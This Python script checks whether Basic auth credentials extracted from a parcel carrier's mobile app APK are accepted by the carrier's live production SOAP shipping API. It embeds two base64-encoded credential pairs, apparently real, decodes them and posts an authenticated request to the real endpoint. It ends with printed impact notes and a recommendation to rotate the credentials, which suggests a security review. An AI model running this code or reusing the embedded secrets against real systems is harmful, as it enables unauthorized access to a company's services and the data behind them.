"""
Purolator SOAP API Credential Test
Tests if extracted Basic auth credentials work for read-only operations
"""

import requests
from requests.auth import HTTPBasicAuth
import base64

# Extracted credentials from APK
ACCOUNT_CRED_B64 = "ZWY3NDc1ZWY3MGI0NGY0Njg3MTU4ZmJiYjlmZjNmNDc6fEhYWTIpLjY="
CREDIT_CRED_B64 = "MDAwYjk0ZDY2MDFmNGM5NmJhNzVkODQ0MzMxN2EyYTk6eHlBfUZXb0Q="

# Decode credentials
account_decoded = base64.b64decode(ACCOUNT_CRED_B64).decode()
credit_decoded = base64.b64decode(CREDIT_CRED_B64).decode()

account_user, account_pass = account_decoded.split(':', 1)
credit_user, credit_pass = credit_decoded.split(':', 1)

print("=" * 80)
print("PUROLATOR SOAP API CREDENTIAL TEST")
print("=" * 80)
print()
print("Testing extracted credentials from mobile app...")
print()

# SOAP API endpoint
BASE_URL = "https://webservices.purolator.com"

# Test 1: Simple GET request to check if endpoint is reachable
print("[TEST 1] Checking endpoint accessibility...")
try:
    response = requests.get(BASE_URL, timeout=10)
    print(f"✓ Endpoint reachable: HTTP {response.status_code}")
except Exception as e:
    print(f"✗ Endpoint error: {e}")
    
print()

# Test 2: Try SOAP endpoint with account credentials (read-only request)
print("[TEST 2] Testing account credentials with SOAP request...")
print(f"Username: {account_user}")
print(f"Password: {'*' * len(account_pass)}")
print()

# Minimal SOAP request to validate credentials (GetShipmentDetails is read-only)
soap_request = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" 
               xmlns:v2="http://purolator.com/pws/datatypes/v2">
  <soap:Header>
    <v2:RequestContext>
      <v2:Version>2.0</v2:Version>
      <v2:Language>en</v2:Language>
    </v2:RequestContext>
  </soap:Header>
  <soap:Body>
    <v2:ValidateShipmentRequest>
      <v2:Shipment>
        <v2:SenderInformation>
          <v2:Address>
            <v2:Name>Test</v2:Name>
            <v2:StreetNumber>123</v2:StreetNumber>
            <v2:StreetName>Test St</v2:StreetName>
            <v2:City>Toronto</v2:City>
            <v2:Province>ON</v2:Province>
            <v2:Country>CA</v2:Country>
            <v2:PostalCode>M5H2N2</v2:PostalCode>
          </v2:Address>
        </v2:SenderInformation>
        <v2:ReceiverInformation>
          <v2:Address>
            <v2:Name>Test</v2:Name>
            <v2:StreetNumber>456</v2:StreetNumber>
            <v2:StreetName>Test Ave</v2:StreetName>
            <v2:City>Vancouver</v2:City>
            <v2:Province>BC</v2:Province>
            <v2:Country>CA</v2:Country>
            <v2:PostalCode>V6B1A1</v2:PostalCode>
          </v2:Address>
        </v2:ReceiverInformation>
      </v2:Shipment>
    </v2:ValidateShipmentRequest>
  </soap:Body>
</soap:Envelope>"""

headers = {
    'Content-Type': 'text/xml; charset=utf-8',
    'SOAPAction': 'http://purolator.com/pws/service/v2/ValidateShipment'
}

try:
    # Test with Basic Auth
    response = requests.post(
        f"{BASE_URL}/EWS/v2/Shipping/ShippingService.asmx",
        data=soap_request,
        headers=headers,
        auth=HTTPBasicAuth(account_user, account_pass),
        timeout=15
    )
    
    print(f"Response Status: HTTP {response.status_code}")
    print()
    print("Response Headers:")
    for key, value in response.headers.items():
        if key.lower() in ['content-type', 'www-authenticate', 'x-amzn-errortype']:
            print(f"  {key}: {value}")
    print()
    
    if response.status_code == 200:
        print("✓ SUCCESS: Credentials accepted!")
        print()
        print("Response preview (first 500 chars):")
        print(response.text[:500])
    elif response.status_code == 401:
        print("✗ UNAUTHORIZED: Credentials rejected")
        print()
        print("Response body:")
        print(response.text[:500])
    elif response.status_code == 403:
        print("⚠ FORBIDDEN: Credentials valid but access denied to this operation")
    else:
        print(f"⚠ Unexpected response")
        print()
        print("Response body (first 1000 chars):")
        print(response.text[:1000])
        
except requests.exceptions.SSLError as e:
    print(f"✗ SSL Error: {e}")
    print("  (This might indicate certificate pinning)")
except requests.exceptions.ConnectionError as e:
    print(f"✗ Connection Error: {e}")
except requests.exceptions.Timeout as e:
    print(f"✗ Timeout: {e}")
except Exception as e:
    print(f"✗ Error: {e}")

print()
print("=" * 80)
print("SECURITY IMPACT")
print("=" * 80)
print()
print("If credentials work:")
print("  - Attacker can interact with SOAP API")
print("  - Depends on server-side validation for write operations")
print("  - May need valid account numbers for billing operations")
print()
print("Recommendation:")
print("  - Verify with PMA/EWS team what operations these credentials allow")
print("  - Check if additional validation (device ID, user session) is required")
print("  - Consider rotating these credentials if they're global")
print()